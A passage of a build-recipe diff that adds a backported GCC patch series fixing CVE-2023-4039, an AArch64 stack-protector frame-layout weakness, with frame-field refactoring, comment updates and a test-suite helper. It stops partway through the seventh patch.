diff --git a/meta/recipes-devtools/gcc/gcc-9.5/CVE-2023-4039.patch b/meta/recipes-devtools/gcc/gcc-9.5/CVE-2023-4039.patch
new file mode 100644
index 0000000000..56d229066f
--- /dev/null
+++ b/meta/recipes-devtools/gcc/gcc-9.5/CVE-2023-4039.patch
@@ -0,0 +1,1506 @@
+From: Richard Sandiford <richard.sandiford@arm.com>
+Subject: [PATCH 00/19] aarch64: Fix -fstack-protector issue
+Date: Tue, 12 Sep 2023 16:25:10 +0100
+
+This series of patches fixes deficiencies in GCC's -fstack-protector
+implementation for AArch64 when using dynamically allocated stack space.
+This is CVE-2023-4039. See:
+
+https://developer.arm.com/Arm%20Security%20Center/GCC%20Stack%20Protector%20Vulnerability%20AArch64
+https://github.com/metaredteam/external-disclosures/security/advisories/GHSA-x7ch-h5rf-w2mf
+
+for more details.
+
+The fix is to put the saved registers above the locals area when
+-fstack-protector is used.
+
+The series also fixes a stack-clash problem that I found while working
+on the CVE. In unpatched sources, the stack-clash problem would only
+trigger for unrealistic numbers of arguments (8K 64-bit arguments, or an
+equivalent). But it would be a more significant issue with the new
+-fstack-protector frame layout. It's therefore important that both
+problems are fixed together.
+
+Some reorganisation of the code seemed necessary to fix the problems in a
+cleanish way. The series is therefore quite long, but only a handful of
+patches should have any effect on code generation.
+
+See the individual patches for a detailed description.
+
+Tested on aarch64-linux-gnu. Pushed to trunk and to all active branches.
+I've also pushed backports to GCC 7+ to vendors/ARM/heads/CVE-2023-4039.
+
+CVE: CVE-2023-4039
+Upstream-Status: Submitted
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+
+From 78ebdb7b12d5e258b9811bab715734454268fd0c Mon Sep 17 00:00:00 2001
+From: Richard Sandiford <richard.sandiford@arm.com>
+Date: Fri, 16 Jun 2023 17:00:51 +0100
+Subject: [PATCH 01/10] aarch64: Explicitly handle frames with no saved
+ registers
+
+If a frame has no saved registers, it can be allocated in one go.
+There is no need to treat the areas below and above the saved
+registers as separate.
+
+And if we allocate the frame in one go, it should be allocated
+as the initial_adjust rather than the final_adjust. This allows the
+frame size to grow to guard_size - guard_used_by_caller before a stack
+probe is needed. (A frame with no register saves is necessarily a
+leaf frame.)
+
+This is a no-op as things stand, since a leaf function will have
+no outgoing arguments, and so all the frame will be above where
+the saved registers normally go.
+
+gcc/
+ * config/aarch64/aarch64.c (aarch64_layout_frame): Explicitly
+ allocate the frame in one go if there are no saved registers.
+---
+ gcc/config/aarch64/aarch64.c | 8 +++++---
+ 1 file changed, 5 insertions(+), 3 deletions(-)
+
+diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
+index a35dceab9fc..e9dad682738 100644
+--- a/gcc/config/aarch64/aarch64.c
++++ b/gcc/config/aarch64/aarch64.c
+@@ -4771,9 +4771,11 @@ aarch64_layout_frame (void)
+ max_push_offset = 256;
+
+ HOST_WIDE_INT const_size, const_fp_offset;
+- if (cfun->machine->frame.frame_size.is_constant (&const_size)
+- && const_size < max_push_offset
+- && known_eq (crtl->outgoing_args_size, 0))
++ if (cfun->machine->frame.saved_regs_size == 0)
++ cfun->machine->frame.initial_adjust = cfun->machine->frame.frame_size;
++ else if (cfun->machine->frame.frame_size.is_constant (&const_size)
++ && const_size < max_push_offset
++ && known_eq (crtl->outgoing_args_size, 0))
+ {
+ /* Simple, small frame with no outgoing arguments:
+ stp reg1, reg2, [sp, -frame_size]!
+--
+2.34.1
+
+
+From 347487fffa0266d43bf18f1f91878410881f596e Mon Sep 17 00:00:00 2001
+From: Richard Sandiford <richard.sandiford@arm.com>
+Date: Fri, 16 Jun 2023 16:55:12 +0100
+Subject: [PATCH 02/10] aarch64: Add bytes_below_hard_fp to frame info
+
+The frame layout code currently hard-codes the assumption that
+the number of bytes below the saved registers is equal to the
+size of the outgoing arguments. This patch abstracts that
+value into a new field of aarch64_frame.
+
+gcc/
+ * config/aarch64/aarch64.h (aarch64_frame::bytes_below_hard_fp): New
+ field.
+ * config/aarch64/aarch64.c (aarch64_layout_frame): Initialize it,
+ and use it instead of crtl->outgoing_args_size.
+ (aarch64_get_separate_components): Use bytes_below_hard_fp instead
+ of outgoing_args_size.
+ (aarch64_process_components): Likewise.
+---
+ gcc/config/aarch64/aarch64.c | 50 +++++++++++++++++++-----------------
+ gcc/config/aarch64/aarch64.h | 6 ++++-
+ 2 files changed, 32 insertions(+), 24 deletions(-)
+
+diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
+index e9dad682738..25cf10cc4b9 100644
+--- a/gcc/config/aarch64/aarch64.c
++++ b/gcc/config/aarch64/aarch64.c
+@@ -4684,6 +4684,8 @@ aarch64_layout_frame (void)
+ last_fp_reg = regno;
+ }
+
++ cfun->machine->frame.bytes_below_hard_fp = crtl->outgoing_args_size;
++
+ if (cfun->machine->frame.emit_frame_chain)
+ {
+ /* FP and LR are placed in the linkage record. */
+@@ -4751,11 +4753,11 @@ aarch64_layout_frame (void)
+ STACK_BOUNDARY / BITS_PER_UNIT);
+
+ /* Both these values are already aligned. */
+- gcc_assert (multiple_p (crtl->outgoing_args_size,
++ gcc_assert (multiple_p (cfun->machine->frame.bytes_below_hard_fp,
+ STACK_BOUNDARY / BITS_PER_UNIT));
+ cfun->machine->frame.frame_size
+ = (cfun->machine->frame.hard_fp_offset
+- + crtl->outgoing_args_size);
++ + cfun->machine->frame.bytes_below_hard_fp);
+
+ cfun->machine->frame.locals_offset = cfun->machine->frame.saved_varargs_size;
+
+@@ -4775,23 +4777,23 @@ aarch64_layout_frame (void)
+ cfun->machine->frame.initial_adjust = cfun->machine->frame.frame_size;
+ else if (cfun->machine->frame.frame_size.is_constant (&const_size)
+ && const_size < max_push_offset
+- && known_eq (crtl->outgoing_args_size, 0))
++ && known_eq (cfun->machine->frame.bytes_below_hard_fp, 0))
+ {
+- /* Simple, small frame with no outgoing arguments:
++ /* Simple, small frame with no data below the saved registers.
+ stp reg1, reg2, [sp, -frame_size]!
+ stp reg3, reg4, [sp, 16] */
+ cfun->machine->frame.callee_adjust = const_size;
+ }
+- else if (known_lt (crtl->outgoing_args_size
++ else if (known_lt (cfun->machine->frame.bytes_below_hard_fp
+ + cfun->machine->frame.saved_regs_size, 512)
+ && !(cfun->calls_alloca
+ && known_lt (cfun->machine->frame.hard_fp_offset,
+ max_push_offset)))
+ {
+- /* Frame with small outgoing arguments:
++ /* Frame with small area below the saved registers:
+ sub sp, sp, frame_size
+- stp reg1, reg2, [sp, outgoing_args_size]
+- stp reg3, reg4, [sp, outgoing_args_size + 16] */
++ stp reg1, reg2, [sp, bytes_below_hard_fp]
++ stp reg3, reg4, [sp, bytes_below_hard_fp + 16] */
+ cfun->machine->frame.initial_adjust = cfun->machine->frame.frame_size;
+ cfun->machine->frame.callee_offset
+ = cfun->machine->frame.frame_size - cfun->machine->frame.hard_fp_offset;
+@@ -4799,22 +4801,23 @@ aarch64_layout_frame (void)
+ else if (cfun->machine->frame.hard_fp_offset.is_constant (&const_fp_offset)
+ && const_fp_offset < max_push_offset)
+ {
+- /* Frame with large outgoing arguments but a small local area:
++ /* Frame with large area below the saved registers, but with a
++ small area above:
+ stp reg1, reg2, [sp, -hard_fp_offset]!
+ stp reg3, reg4, [sp, 16]
+- sub sp, sp, outgoing_args_size */
++ sub sp, sp, bytes_below_hard_fp */
+ cfun->machine->frame.callee_adjust = const_fp_offset;
+ cfun->machine->frame.final_adjust
+ = cfun->machine->frame.frame_size - cfun->machine->frame.callee_adjust;
+ }
+ else
+ {
+- /* Frame with large local area and outgoing arguments using frame pointer:
++ /* General case:
+ sub sp, sp, hard_fp_offset
+ stp x29, x30, [sp, 0]
+ add x29, sp, 0
+ stp reg3, reg4, [sp, 16]
+- sub sp, sp, outgoing_args_size */
++ sub sp, sp, bytes_below_hard_fp */
+ cfun->machine->frame.initial_adjust = cfun->machine->frame.hard_fp_offset;
+ cfun->machine->frame.final_adjust
+ = cfun->machine->frame.frame_size - cfun->machine->frame.initial_adjust;
+@@ -5243,9 +5246,11 @@ aarch64_get_separate_components (void)
+ if (aarch64_register_saved_on_entry (regno))
+ {
+ poly_int64 offset = cfun->machine->frame.reg_offset[regno];
++
++ /* Get the offset relative to the register we'll use. */
+ if (!frame_pointer_needed)
+- offset += cfun->machine->frame.frame_size
+- - cfun->machine->frame.hard_fp_offset;
++ offset += cfun->machine->frame.bytes_below_hard_fp;
++
+ /* Check that we can access the stack slot of the register with one
+ direct load with no adjustments needed. */
+ if (offset_12bit_unsigned_scaled_p (DImode, offset))
+@@ -5367,8 +5372,8 @@ aarch64_process_components (sbitmap components, bool prologue_p)
+ rtx reg = gen_rtx_REG (mode, regno);
+ poly_int64 offset = cfun->machine->frame.reg_offset[regno];
+ if (!frame_pointer_needed)
+- offset += cfun->machine->frame.frame_size
+- - cfun->machine->frame.hard_fp_offset;
++ offset += cfun->machine->frame.bytes_below_hard_fp;
++
+ rtx addr = plus_constant (Pmode, ptr_reg, offset);
+ rtx mem = gen_frame_mem (mode, addr);
+
+@@ -5410,8 +5415,7 @@ aarch64_process_components (sbitmap components, bool prologue_p)
+ /* REGNO2 can be saved/restored in a pair with REGNO. */
+ rtx reg2 = gen_rtx_REG (mode, regno2);
+ if (!frame_pointer_needed)
+- offset2 += cfun->machine->frame.frame_size
+- - cfun->machine->frame.hard_fp_offset;
++ offset2 += cfun->machine->frame.bytes_below_hard_fp;
+ rtx addr2 = plus_constant (Pmode, ptr_reg, offset2);
+ rtx mem2 = gen_frame_mem (mode, addr2);
+ rtx set2 = prologue_p ? gen_rtx_SET (mem2, reg2)
+@@ -5478,10 +5482,10 @@ aarch64_stack_clash_protection_alloca_probe_range (void)
+ registers. If POLY_SIZE is not large enough to require a probe this function
+ will only adjust the stack. When allocating the stack space
+ FRAME_RELATED_P is then used to indicate if the allocation is frame related.
+- FINAL_ADJUSTMENT_P indicates whether we are allocating the outgoing
+- arguments. If we are then we ensure that any allocation larger than the ABI
+- defined buffer needs a probe so that the invariant of having a 1KB buffer is
+- maintained.
++ FINAL_ADJUSTMENT_P indicates whether we are allocating the area below
++ the saved registers. If we are then we ensure that any allocation
++ larger than the ABI defined buffer needs a probe so that the
++ invariant of having a 1KB buffer is maintained.
+
+ We emit barriers after each stack adjustment to prevent optimizations from
+ breaking the invariant that we never drop the stack more than a page. This
+@@ -5671,7 +5675,7 @@ aarch64_allocate_and_probe_stack_space (rtx temp1, rtx temp2,
+ /* Handle any residuals. Residuals of at least MIN_PROBE_THRESHOLD have to
+ be probed. This maintains the requirement that each page is probed at
+ least once. For initial probing we probe only if the allocation is
+- more than GUARD_SIZE - buffer, and for the outgoing arguments we probe
++ more than GUARD_SIZE - buffer, and below the saved registers we probe
+ if the amount is larger than buffer. GUARD_SIZE - buffer + buffer ==
+ GUARD_SIZE. This works that for any allocation that is large enough to
+ trigger a probe here, we'll have at least one, and if they're not large
+diff --git a/gcc/config/aarch64/aarch64.h b/gcc/config/aarch64/aarch64.h
+index af0bc3f1881..95831637ba7 100644
+--- a/gcc/config/aarch64/aarch64.h
++++ b/gcc/config/aarch64/aarch64.h
+@@ -712,9 +712,13 @@ struct GTY (()) aarch64_frame
+ HOST_WIDE_INT saved_varargs_size;
+
+ /* The size of the saved callee-save int/FP registers. */
+-
+ HOST_WIDE_INT saved_regs_size;
+
++ /* The number of bytes between the bottom of the static frame (the bottom
++ of the outgoing arguments) and the hard frame pointer. This value is
++ always a multiple of STACK_BOUNDARY. */
++ poly_int64 bytes_below_hard_fp;
++
+ /* Offset from the base of the frame (incomming SP) to the
+ top of the locals area. This value is always a multiple of
+ STACK_BOUNDARY. */
+--
+2.34.1
+
+
+From 4604c4cd0a6c4c26d6594ec9a0383b4d9197d9df Mon Sep 17 00:00:00 2001
+From: Richard Sandiford <richard.sandiford@arm.com>
+Date: Tue, 27 Jun 2023 11:25:40 +0100
+Subject: [PATCH 03/10] aarch64: Rename locals_offset to bytes_above_locals
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+locals_offset was described as:
+
+ /* Offset from the base of the frame (incomming SP) to the
+ top of the locals area. This value is always a multiple of
+ STACK_BOUNDARY. */
+
+This is implicitly an “upside down” view of the frame: the incoming
+SP is at offset 0, and anything N bytes below the incoming SP is at
+offset N (rather than -N).
+
+However, reg_offset instead uses a “right way up” view; that is,
+it views offsets in address terms. Something above X is at a
+positive offset from X and something below X is at a negative
+offset from X.
+
+Also, even on FRAME_GROWS_DOWNWARD targets like AArch64,
+target-independent code views offsets in address terms too:
+locals are allocated at negative offsets to virtual_stack_vars.
+
+It seems confusing to have *_offset fields of the same structure
+using different polarities like this. This patch tries to avoid
+that by renaming locals_offset to bytes_above_locals.
+
+gcc/
+ * config/aarch64/aarch64.h (aarch64_frame::locals_offset): Rename to...
+ (aarch64_frame::bytes_above_locals): ...this.
+ * config/aarch64/aarch64.c (aarch64_layout_frame)
+ (aarch64_initial_elimination_offset): Update accordingly.
+---
+ gcc/config/aarch64/aarch64.c | 9 +++++----
+ gcc/config/aarch64/aarch64.h | 6 +++---
+ 2 files changed, 8 insertions(+), 7 deletions(-)
+
+diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
+index 25cf10cc4b9..dcaf491af42 100644
+--- a/gcc/config/aarch64/aarch64.c
++++ b/gcc/config/aarch64/aarch64.c
+@@ -4759,7 +4759,8 @@ aarch64_layout_frame (void)
+ = (cfun->machine->frame.hard_fp_offset
+ + cfun->machine->frame.bytes_below_hard_fp);
+
+- cfun->machine->frame.locals_offset = cfun->machine->frame.saved_varargs_size;
++ cfun->machine->frame.bytes_above_locals
++ = cfun->machine->frame.saved_varargs_size;
+
+ cfun->machine->frame.initial_adjust = 0;
+ cfun->machine->frame.final_adjust = 0;
+@@ -8566,14 +8567,14 @@ aarch64_initial_elimination_offset (unsigned from, unsigned to)
+
+ if (from == FRAME_POINTER_REGNUM)
+ return cfun->machine->frame.hard_fp_offset
+- - cfun->machine->frame.locals_offset;
++ - cfun->machine->frame.bytes_above_locals;
+ }
+
+ if (to == STACK_POINTER_REGNUM)
+ {
+ if (from == FRAME_POINTER_REGNUM)
+- return cfun->machine->frame.frame_size
+- - cfun->machine->frame.locals_offset;
++ return cfun->machine->frame.frame_size
++ - cfun->machine->frame.bytes_above_locals;
+ }
+
+ return cfun->machine->frame.frame_size;
+diff --git a/gcc/config/aarch64/aarch64.h b/gcc/config/aarch64/aarch64.h
+index 95831637ba7..a079a88b4f4 100644
+--- a/gcc/config/aarch64/aarch64.h
++++ b/gcc/config/aarch64/aarch64.h
+@@ -719,10 +719,10 @@ struct GTY (()) aarch64_frame
+ always a multiple of STACK_BOUNDARY. */
+ poly_int64 bytes_below_hard_fp;
+
+- /* Offset from the base of the frame (incomming SP) to the
+- top of the locals area. This value is always a multiple of
++ /* The number of bytes between the top of the locals area and the top
++ of the frame (the incomming SP). This value is always a multiple of
+ STACK_BOUNDARY. */
+- poly_int64 locals_offset;
++ poly_int64 bytes_above_locals;
+
+ /* Offset from the base of the frame (incomming SP) to the
+ hard_frame_pointer. This value is always a multiple of
+--
+2.34.1
+
+
+From 16016465ff28a75f5e0540cbaeb4eb102fdc3230 Mon Sep 17 00:00:00 2001
+From: Richard Sandiford <richard.sandiford@arm.com>
+Date: Tue, 27 Jun 2023 11:28:11 +0100
+Subject: [PATCH 04/10] aarch64: Rename hard_fp_offset to bytes_above_hard_fp
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Similarly to the previous locals_offset patch, hard_fp_offset
+was described as:
+
+ /* Offset from the base of the frame (incomming SP) to the
+ hard_frame_pointer. This value is always a multiple of
+ STACK_BOUNDARY. */
+ poly_int64 hard_fp_offset;
+
+which again took an “upside-down” view: higher offsets meant lower
+addresses. This patch renames the field to bytes_above_hard_fp instead.
+
+gcc/
+ * config/aarch64/aarch64.h (aarch64_frame::hard_fp_offset): Rename
+ to...
+ (aarch64_frame::bytes_above_hard_fp): ...this.
+ * config/aarch64/aarch64.c (aarch64_layout_frame)
+ (aarch64_expand_prologue): Update accordingly.
+ (aarch64_initial_elimination_offset): Likewise.
+---
+ gcc/config/aarch64/aarch64.c | 21 +++++++++++----------
+ gcc/config/aarch64/aarch64.h | 6 +++---
+ 2 files changed, 14 insertions(+), 13 deletions(-)
+
+diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
+index dcaf491af42..2681e0c2bb9 100644
+--- a/gcc/config/aarch64/aarch64.c
++++ b/gcc/config/aarch64/aarch64.c
+@@ -4747,7 +4747,7 @@ aarch64_layout_frame (void)
+ HOST_WIDE_INT varargs_and_saved_regs_size
+ = offset + cfun->machine->frame.saved_varargs_size;
+
+- cfun->machine->frame.hard_fp_offset
++ cfun->machine->frame.bytes_above_hard_fp
+ = aligned_upper_bound (varargs_and_saved_regs_size
+ + get_frame_size (),
+ STACK_BOUNDARY / BITS_PER_UNIT);
+@@ -4756,7 +4756,7 @@ aarch64_layout_frame (void)
+ gcc_assert (multiple_p (cfun->machine->frame.bytes_below_hard_fp,
+ STACK_BOUNDARY / BITS_PER_UNIT));
+ cfun->machine->frame.frame_size
+- = (cfun->machine->frame.hard_fp_offset
++ = (cfun->machine->frame.bytes_above_hard_fp
+ + cfun->machine->frame.bytes_below_hard_fp);
+
+ cfun->machine->frame.bytes_above_locals
+@@ -4788,7 +4788,7 @@ aarch64_layout_frame (void)
+ else if (known_lt (cfun->machine->frame.bytes_below_hard_fp
+ + cfun->machine->frame.saved_regs_size, 512)
+ && !(cfun->calls_alloca
+- && known_lt (cfun->machine->frame.hard_fp_offset,
++ && known_lt (cfun->machine->frame.bytes_above_hard_fp,
+ max_push_offset)))
+ {
+ /* Frame with small area below the saved registers:
+@@ -4797,14 +4797,14 @@ aarch64_layout_frame (void)
+ stp reg3, reg4, [sp, bytes_below_hard_fp + 16] */
+ cfun->machine->frame.initial_adjust = cfun->machine->frame.frame_size;
+ cfun->machine->frame.callee_offset
+- = cfun->machine->frame.frame_size - cfun->machine->frame.hard_fp_offset;
++ = cfun->machine->frame.frame_size - cfun->machine->frame.bytes_above_hard_fp;
+ }
+- else if (cfun->machine->frame.hard_fp_offset.is_constant (&const_fp_offset)
++ else if (cfun->machine->frame.bytes_above_hard_fp.is_constant (&const_fp_offset)
+ && const_fp_offset < max_push_offset)
+ {
+ /* Frame with large area below the saved registers, but with a
+ small area above:
+- stp reg1, reg2, [sp, -hard_fp_offset]!
++ stp reg1, reg2, [sp, -bytes_above_hard_fp]!
+ stp reg3, reg4, [sp, 16]
+ sub sp, sp, bytes_below_hard_fp */
+ cfun->machine->frame.callee_adjust = const_fp_offset;
+@@ -4814,12 +4814,13 @@ aarch64_layout_frame (void)
+ else
+ {
+ /* General case:
+- sub sp, sp, hard_fp_offset
++ sub sp, sp, bytes_above_hard_fp
+ stp x29, x30, [sp, 0]
+ add x29, sp, 0
+ stp reg3, reg4, [sp, 16]
+ sub sp, sp, bytes_below_hard_fp */
+- cfun->machine->frame.initial_adjust = cfun->machine->frame.hard_fp_offset;
++ cfun->machine->frame.initial_adjust
++ = cfun->machine->frame.bytes_above_hard_fp;
+ cfun->machine->frame.final_adjust
+ = cfun->machine->frame.frame_size - cfun->machine->frame.initial_adjust;
+ }
+@@ -8563,10 +8564,10 @@ aarch64_initial_elimination_offset (unsigned from, unsigned to)
+ if (to == HARD_FRAME_POINTER_REGNUM)
+ {
+ if (from == ARG_POINTER_REGNUM)
+- return cfun->machine->frame.hard_fp_offset;
++ return cfun->machine->frame.bytes_above_hard_fp;
+
+ if (from == FRAME_POINTER_REGNUM)
+- return cfun->machine->frame.hard_fp_offset
++ return cfun->machine->frame.bytes_above_hard_fp
+ - cfun->machine->frame.bytes_above_locals;
+ }
+
+diff --git a/gcc/config/aarch64/aarch64.h b/gcc/config/aarch64/aarch64.h
+index a079a88b4f4..eab6da84a02 100644
+--- a/gcc/config/aarch64/aarch64.h
++++ b/gcc/config/aarch64/aarch64.h
+@@ -724,10 +724,10 @@ struct GTY (()) aarch64_frame
+ STACK_BOUNDARY. */
+ poly_int64 bytes_above_locals;
+
+- /* Offset from the base of the frame (incomming SP) to the
+- hard_frame_pointer. This value is always a multiple of
++ /* The number of bytes between the hard_frame_pointer and the top of
++ the frame (the incomming SP). This value is always a multiple of
+ STACK_BOUNDARY. */
+- poly_int64 hard_fp_offset;
++ poly_int64 bytes_above_hard_fp;
+
+ /* The size of the frame. This value is the offset from base of the
+ frame (incomming SP) to the stack_pointer. This value is always
+--
+2.34.1
+
+
+From eb2271eb6bb68ec3c9aa9ae4746ea1ee5f18874a Mon Sep 17 00:00:00 2001
+From: Richard Sandiford <richard.sandiford@arm.com>
+Date: Thu, 22 Jun 2023 22:26:30 +0100
+Subject: [PATCH 05/10] aarch64: Tweak frame_size comment
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This patch fixes another case in which a value was described with
+an “upside-down” view.
+
+gcc/
+ * config/aarch64/aarch64.h (aarch64_frame::frame_size): Tweak comment.
+---
+ gcc/config/aarch64/aarch64.h | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/gcc/config/aarch64/aarch64.h b/gcc/config/aarch64/aarch64.h
+index eab6da84a02..7c4b65ec55b 100644
+--- a/gcc/config/aarch64/aarch64.h
++++ b/gcc/config/aarch64/aarch64.h
+@@ -729,8 +729,8 @@ struct GTY (()) aarch64_frame
+ STACK_BOUNDARY. */
+ poly_int64 bytes_above_hard_fp;
+
+- /* The size of the frame. This value is the offset from base of the
+- frame (incomming SP) to the stack_pointer. This value is always
++ /* The size of the frame, i.e. the number of bytes between the bottom
++ of the outgoing arguments and the incoming SP. This value is always
+ a multiple of STACK_BOUNDARY. */
+ poly_int64 frame_size;
+
+--
+2.34.1
+
+
+From cfed3b87e9351edff1568ade4ef666edc9887639 Mon Sep 17 00:00:00 2001
+From: Richard Sandiford <richard.sandiford@arm.com>
+Date: Tue, 15 Aug 2023 19:05:30 +0100
+Subject: [PATCH 06/10] Backport check-function-bodies support
+
+---
+ gcc/testsuite/lib/scanasm.exp | 191 ++++++++++++++++++++++++++++++++++
+ 1 file changed, 191 insertions(+)
+
+diff --git a/gcc/testsuite/lib/scanasm.exp b/gcc/testsuite/lib/scanasm.exp
+index 35ccbc86fc0..c9af27bf47a 100644
+--- a/gcc/testsuite/lib/scanasm.exp
++++ b/gcc/testsuite/lib/scanasm.exp
+@@ -546,3 +546,194 @@ proc scan-lto-assembler { args } {
+ verbose "output_file: $output_file"
+ dg-scan "scan-lto-assembler" 1 $testcase $output_file $args
+ }
++
++# Read assembly file FILENAME and store a mapping from function names
++# to function bodies in array RESULT. FILENAME has already been uploaded
++# locally where necessary and is known to exist.
++
++proc parse_function_bodies { filename result } {
++ upvar $result up_result
++
++ # Regexp for the start of a function definition (name in \1).
++ set label {^([a-zA-Z_]\S+):$}
++
++ # Regexp for the end of a function definition.
++ set terminator {^\s*\.size}
++
++ # Regexp for lines that aren't interesting.
++ set fluff {^\s*(?:\.|//|@|$)}
++
++ set fd [open $filename r]
++ set in_function 0
++ while { [gets $fd line] >= 0 } {
++ if { [regexp $label $line dummy function_name] } {
++ set in_function 1
++ set function_body ""
++ } elseif { $in_function } {
++ if { [regexp $terminator $line] } {
++ set up_result($function_name) $function_body
++ set in_function 0
++ } elseif { ![regexp $fluff $line] } {
++ append function_body $line "\n"
++ }
++ }
++ }
++ close $fd
++}
++
++# FUNCTIONS is an array that maps function names to function bodies.
++# Return true if it contains a definition of function NAME and if
++# that definition matches BODY_REGEXP.
++
++proc check_function_body { functions name body_regexp } {
++ upvar $functions up_functions
++
++ if { ![info exists up_functions($name)] } {
++ return 0
++ }
++ set fn_res [regexp "^$body_regexp\$" $up_functions($name)]
++ if { !$fn_res } {
++ verbose -log "body: $body_regexp"
++ verbose -log "against: $up_functions($name)"
++ }
++ return $fn_res
++}
++
++# Check the implementations of functions against expected output. Used as:
++#
++# { dg-do { check-function-bodies PREFIX TERMINATOR[ OPTION[ SELECTOR]] } }
++#
++# See sourcebuild.texi for details.
++
++proc check-function-bodies { args } {
++ if { [llength $args] < 2 } {
++ error "too few arguments to check-function-bodies"
++ }
++ if { [llength $args] > 4 } {
++ error "too many arguments to check-function-bodies"
++ }
++
++ if { [llength $args] >= 3 } {
++ set required_flags [lindex $args 2]
++
++ upvar 2 dg-extra-tool-flags extra_tool_flags
++ set flags $extra_tool_flags
++
++ global torture_current_flags
++ if { [info exists torture_current_flags] } {
++ append flags " " $torture_current_flags
++ }
++ foreach required_flag $required_flags {
++ switch -- $required_flag {
++ target -
++ xfail {
++ error "misplaced $required_flag in check-function-bodies"
++ }
++ }
++ }
++ foreach required_flag $required_flags {
++ if { ![regexp " $required_flag " $flags] } {
++ return
++ }
++ }
++ }
++
++ set xfail_all 0
++ if { [llength $args] >= 4 } {
++ switch [dg-process-target [lindex $args 3]] {
++ "S" { }
++ "N" { return }
++ "F" { set xfail_all 1 }
++ "P" { }
++ }
++ }
++
++ set testcase [testname-for-summary]
++ # The name might include a list of options; extract the file name.
++ set filename [lindex $testcase 0]
++
++ global srcdir
++ set input_filename "$srcdir/$filename"
++ set output_filename "[file rootname [file tail $filename]].s"
++
++ set prefix [lindex $args 0]
++ set prefix_len [string length $prefix]
++ set terminator [lindex $args 1]
++ if { [string equal $terminator ""] } {
++ set terminator "*/"
++ }
++ set terminator_len [string length $terminator]
++
++ set have_bodies 0
++ if { [is_remote host] } {
++ remote_upload host "$filename"
++ }
++ if { [file exists $output_filename] } {
++ parse_function_bodies $output_filename functions
++ set have_bodies 1
++ } else {
++ verbose -log "$testcase: output file does not exist"
++ }
++
++ set count 0
++ set function_regexp ""
++ set label {^(\S+):$}
++
++ set lineno 1
++ set fd [open $input_filename r]
++ set in_function 0
++ while { [gets $fd line] >= 0 } {
++ if { [string equal -length $prefix_len $line $prefix] } {
++ set line [string trim [string range $line $prefix_len end]]
++ if { !$in_function } {
++ if { [regexp "^(.*?\\S)\\s+{(.*)}\$" $line dummy \
++ line selector] } {
++ set selector [dg-process-target $selector]
++ } else {
++ set selector "P"
++ }
++ if { ![regexp $label $line dummy function_name] } {
++ close $fd
++ error "check-function-bodies: line $lineno does not have a function label"
++ }
++ set in_function 1
++ set function_regexp ""
++ } elseif { [string equal $line "("] } {
++ append function_regexp "(?:"
++ } elseif { [string equal $line "|"] } {
++ append function_regexp "|"
++ } elseif { [string equal $line ")"] } {
++ append function_regexp ")"
++ } elseif { [string equal $line "..."] } {
++ append function_regexp ".*"
++ } else {
++ append function_regexp "\t" $line "\n"
++ }
++ } elseif { [string equal -length $terminator_len $line $terminator] } {
++ if { ![string equal $selector "N"] } {
++ if { $xfail_all || [string equal $selector "F"] } {
++ setup_xfail "*-*-*"
++ }
++ set testname "$testcase check-function-bodies $function_name"
++ if { !$have_bodies } {
++ unresolved $testname
++ } elseif { [check_function_body functions $function_name \
++ $function_regexp] } {
++ pass $testname
++ } else {
++ fail $testname
++ }
++ }
++ set in_function 0
++ incr count
++ }
++ incr lineno
++ }
++ close $fd
++ if { $in_function } {
++ error "check-function-bodies: missing \"$terminator\""
++ }
++ if { $count == 0 } {
++ error "check-function-bodies: no matches found"
++ }
++}
+--
+2.34.1
+
+
+From 4dd8925d95d3d6d89779b494b5f4cfadcf9fa96e Mon Sep 17 00:00:00 2001
+From: Richard Sandiford <richard.sandiford@arm.com>
+Date: Tue, 27 Jun 2023 15:11:44 +0100
+Subject: [PATCH 07/10] aarch64: Tweak stack clash boundary condition
+
+The AArch64 ABI says that, when stack clash protection is used,
+there can be a maximum of 1KiB of unprobed space at sp on entry
+to a function. Therefore, we need to probe when allocating
+>= guard_size - 1KiB of data (>= rather than >). This is what
+GCC does.
+
+If an allocation is exactly guard_size bytes, it is enough to allocate
+those bytes and probe once at offset 1024. It isn't possible to use a
+single probe at any other offset: higher would complicate later code,
+by leaving more unprobed space than usual, while lower would risk
+leaving an entire page unprobed. For simplicity, the code probes all
+allocations at offset 1024.
+
+Some register saves also act as probes. If we need to allocate
+more space below the last such register save probe, we need to
+probe the allocation if it is > 1KiB. Again, this allocation is
+then sometimes (but not always) probed at offset 1024. This sort of
+allocation is currently only used for outgoing arguments, which are
+rarely this big.
+
+However, the code also probed if this final outgoing-arguments
+allocation was == 1KiB, rather than just > 1KiB. This isn't
+necessary, since the register save then probes at offset 1024
+as required. Continuing to probe allocations of exactly 1KiB
+would complicate later patches.
+
+gcc/
+ * config/aarch64/aarch64.c (aarch64_allocate_and_probe_stack_space):
+ Don't probe final allocations that are exactly 1KiB in size (after
+ unprobed space above the final allocation has been deducted).
+
+gcc/testsuite/
+ * gcc.target/aarch64/stack-check-prologue-17.c: New test.
+---
+ gcc/config/aarch64/aarch64.c | 6 +-
+ .../aarch64/stack-check-prologue-17.c | 55 +++++++++++++++++++
+ 2 files changed, 60 insertions(+), 1 deletion(-)
+ create mode 100644 gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c
+
+diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
+index 2681e0c2bb9..4c9e11cd7cf 100644
+--- a/gcc/config/aarch64/aarch64.c
++++ b/gcc/config/aarch64/aarch64.c
+@@ -5506,6 +5506,8 @@ aarch64_allocate_and_probe_stack_space (rtx temp1, rtx temp2,
+ HOST_WIDE_INT guard_size
+ = 1 << PARAM_VALUE (PARAM_STACK_CLASH_PROTECTION_GUARD_SIZE);
+ HOST_WIDE_INT guard_used_by_caller = STACK_CLASH_CALLER_GUARD;
